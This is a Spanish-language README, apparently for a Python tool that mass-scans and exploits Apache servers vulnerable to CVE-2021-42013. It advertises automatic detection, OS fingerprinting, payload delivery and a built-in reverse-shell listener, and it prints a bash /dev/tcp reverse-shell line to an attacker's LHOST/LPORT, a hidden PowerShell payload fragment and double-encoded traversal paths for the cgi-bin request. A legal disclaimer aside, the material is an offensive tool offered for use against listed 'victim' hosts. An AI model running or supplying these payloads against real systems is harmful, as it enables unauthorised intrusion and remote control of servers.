
Una herramienta avanzada de escaneo, explotación e interacción remota diseñada para detectar y aprovechar la vulnerabilidad Apache Path Traversal + RCE (CVE-2021-42013) en servidores mal configurados.
# 🔥 CVE-2021-42013 Exploit Framework by Makaveli
> 💀 Modo Hacker Cósmico Multidimensional activado...
Una herramienta avanzada de escaneo, explotación e interacción remota diseñada para detectar y aprovechar la vulnerabilidad **Apache Path Traversal + RCE (CVE-2021-42013)** en servidores mal configurados.
---
## ⚠️ Advertencia Legal
> Este software se proporciona únicamente con fines educativos y de investigación en entornos controlados.
El uso de esta herramienta contra sistemas sin autorización expresa puede ser ilegal y constituye un delito en muchos países.
El autor no se hace responsable por el uso indebido de este código. Úsalo bajo tu propio riesgo y siempre con permiso explícito del propietario del sistema objetivo.
---
🧠 Descripción Técnica
Esta herramienta permite:
- ✅ Escanear múltiples objetivos desde un archivo `.txt`.
- ✅ Detectar automáticamente la presencia de CVE-2021-42013.
- ✅ Identificar el sistema operativo remoto (Linux o Windows).
- ✅ Enviar payloads personalizados según el sistema detectado.
- ✅ Establecer una reverse shell y obtener acceso remoto.
- ✅ Interactuar con la shell en tiempo real mediante un listener integrado.
- ✅ Disfrutar de logs avanzados, barra de progreso y menú interactivo.
---
## 🔧 Requisitos
- Python **3.8+**
- Sistemas basados en Unix/Linux/MacOS (uso de `subprocess` y `curl`)
- Requiere las siguientes librerías de Python:
```bash
pip install -r requirements.txt
requirements.txt
rich
alive-progress
También necesitas tener instalado curl en el sistema operativo.
.
├── POC-CVE.py # Script principal
├── logs.txt # Archivo de logs generado automáticamente
├── requirements.txt # Dependencias Python
└── targets.txt # (Opcional) Lista de URLs a escanear
python3 POC-CVE.py
Selecciona entre:
scan_file: Escanea múltiples URLs desde un archivo y muestra cuáles son vulnerables.exploit: Explotación directa de un solo objetivo, con shell inversa.exit: Salir del modo interactivo.http://example.com
http://victim.net
http://192.168.1.100
python3 POC-CVE.py
Elige scan_file y proporciona:
exploit en el menú.LHOST) para recibir la shellLPORT) para el listenerEl script:
bash -c 'exec 124<>/dev/tcp/LHOST/LPORT;sh <&124 >&124 2>&124'
powershell -NoP -NonI -W Hidden -Command ...
/.%252e/.%252e/.%252e)curlUser-Agent, Accept, etc)GET /cgi-bin/.%%32%65/.%%32%65/...Este proyecto se proporciona "tal cual", sin garantías ni responsabilidad por daños derivados de su uso. Nunca escanees ni explotes un sistema sin el consentimiento explícito de su propietario.
---